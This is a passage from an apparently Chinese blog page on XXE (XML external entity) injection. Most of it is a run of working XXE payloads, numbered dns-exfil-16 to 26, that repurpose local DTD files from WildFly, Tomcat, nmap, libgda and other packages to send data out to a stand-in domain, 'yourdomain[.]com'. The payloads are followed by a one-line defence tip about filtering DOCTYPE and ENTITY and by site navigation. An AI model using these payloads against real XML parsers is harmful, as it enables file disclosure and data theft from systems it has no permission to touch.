"jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file "dns-exfil-16"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-17"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-18"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file "dns-exfil-19"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file "dns-exfil-20"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file "dns-exfil-21"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file "dns-exfil-22"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-23"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file "dns-exfil-24"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file "dns-exfil-25"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file "dns-exfil-26"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message>
XXE防護
過濾用戶提交的XML數據,過濾關鍵詞:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC,禁用外部實體引用。
相關文章
- 1. xxe漏洞
- 2. XXE漏洞
- 3. XXE 漏洞基本的瞭解
- 4. XXE實體注入漏洞詳解
- 5. 淺談XXE漏洞攻擊與防禦
- 6. XXE漏洞簡析
- 7. web漏洞之XXE
- 8. XXE漏洞分析
- 9. XXE漏洞學習
- 10. XXE漏洞原理
- 更多相關文章...
- • C# 文件的輸入與輸出 - C#教程
- • XSL-FO 輸出 - XSL-FO 教程
- • 算法總結-深度優先算法
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 外部其他進程嵌入到qt FindWindow獲得窗口句柄 報錯無法鏈接的外部符號 [email protected] 無法被([email protected]@[email protected]@@引用
- 2. UVa 11524 - InCircle
- 3. The Monocycle(bfs)
- 4. VEC-C滑窗
- 5. 堆排序的應用-TOPK問題
- 6. 實例演示ElasticSearch索引查詢term,match,match_phase,query_string之間的區別
- 7. 數學基礎知識 集合
- 8. amazeUI 復擇框問題解決
- 9. 揹包問題理解
- 10. 算數平均-幾何平均不等式的證明,從麥克勞林到柯西
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. xxe漏洞
- 2. XXE漏洞
- 3. XXE 漏洞基本的瞭解
- 4. XXE實體注入漏洞詳解
- 5. 淺談XXE漏洞攻擊與防禦
- 6. XXE漏洞簡析
- 7. web漏洞之XXE
- 8. XXE漏洞分析
- 9. XXE漏洞學習
- 10. XXE漏洞原理